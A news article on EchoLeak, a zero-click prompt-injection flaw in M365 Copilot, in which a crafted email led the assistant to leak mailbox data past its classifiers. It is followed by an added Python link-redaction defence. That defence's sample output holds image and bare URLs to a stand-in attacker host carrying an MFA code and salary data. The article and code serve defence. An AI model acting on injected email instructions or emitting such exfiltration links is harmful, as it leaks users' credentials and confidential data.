Microsoft quietly fixed a critical-rated vulnerability in its M365 Copilot AI platform last Tuesday. The flaw, discovered by security firm Aim Security, allowed attackers to steal sensitive data, including two-factor authentication codes, from emails accessible to Copilot using nothing more than a single carefully crafted message.

The vulnerability, tracked as CVE-2025-32711 and dubbed “EchoLeak,” carried a CVSS severity score of 9.3 out of 10.

How EchoLeak worked

The attack required zero clicks from the victim. An attacker could send a malicious email that, when processed by Copilot, would trick the AI into exfiltrating organizational data: emails, documents, chat histories, the works. The proof-of-concept exploit demonstrated by Aim Security showed automatic data theft triggered simply by Copilot summarizing or interacting with the poisoned message.

The attack bypassed Microsoft’s existing defenses, including cross-prompt injection classifiers and external link redactions.
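The article names external link redaction as one of the defenses an assistant's output passes through before it reaches the user. The following is an added illustration of that kind of control, not code from the article, from Aim Security, or from Microsoft's own Copilot pipeline: a small allowlist-based redactor that strips any URL pointing outside the organization's trusted hosts from assistant-generated text (bare URLs as well as markdown link and image syntax) and reports what it removed, so a security team can log how often model output tried to reach an outside host. The host names, the sample output and the allowlist are all constructed for the example.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist of hosts the organization trusts; constructed for this example.
TRUSTED_HOSTS = {"contoso.example", "sharepoint.contoso.example"}

# Markdown link or image: optional "!", [label](url "optional title")
_MD_LINK = re.compile(r'!?\[([^\]]*)\]\((\S+?)(?:\s+"[^"]*")?\)')
# Bare http(s) URL, stopping at whitespace or common delimiters
_BARE_URL = re.compile(r"""https?://[^\s<>()"']+""")

REDACTED = "[external link removed]"


def is_trusted(url: str) -> bool:
    """True if the URL's host is an allowlisted host or a subdomain of one."""
    host = (urlparse(url).hostname or "").lower()
    return any(host == h or host.endswith("." + h) for h in TRUSTED_HOSTS)


def redact_external_links(text: str) -> tuple[str, list[str]]:
    """Remove untrusted URLs from assistant output.

    Returns (redacted_text, flagged_urls). Markdown links keep their visible
    label; markdown images and bare URLs are replaced with a marker so the
    reader can see something was stripped. Flagged URLs are returned for
    logging, since an unexpected outbound URL in model output is itself a
    signal worth alerting on.
    """
    flagged: list[str] = []

    def md_repl(m: re.Match) -> str:
        label, url = m.group(1), m.group(2)
        if is_trusted(url):
            return m.group(0)
        flagged.append(url)
        return label if label else REDACTED

    def bare_repl(m: re.Match) -> str:
        url = m.group(0)
        if is_trusted(url):
            return url
        flagged.append(url)
        return REDACTED

    # Markdown syntax first so trusted links survive intact; the bare-URL pass
    # then sees the trusted URL inside "(...)" and leaves it alone as well.
    out = _MD_LINK.sub(md_repl, text)
    out = _BARE_URL.sub(bare_repl, out)
    return out, flagged


def has_exfil_risk(text: str) -> bool:
    """Convenience check: does the output reference any host outside the allowlist?"""
    return bool(redact_external_links(text)[1])


# Constructed sample of assistant output: one legitimate internal reference and
# two outbound URLs whose query strings carry data that should never leave.
SAMPLE_OUTPUT = (
    "Summary of the thread: the vendor invoice is approved.\n"
    "Reference: [policy doc](https://sharepoint.contoso.example/policy.docx)\n"
    "![status](https://attacker.invalid/img.png?d=MFA-code-123456)\n"
    "See also https://attacker.invalid/collect?q=salary-report"
)

if __name__ == "__main__":
    clean, removed = redact_external_links(SAMPLE_OUTPUT)
    print(clean)
    for url in removed:
        print("flagged:", url)
```

The allowlist approach is deliberately conservative: anything not explicitly trusted is stripped, which is the right default for a channel where the model, not the user, decides what link to emit. The flagged list is what a detection pipeline would ship to the SIEM.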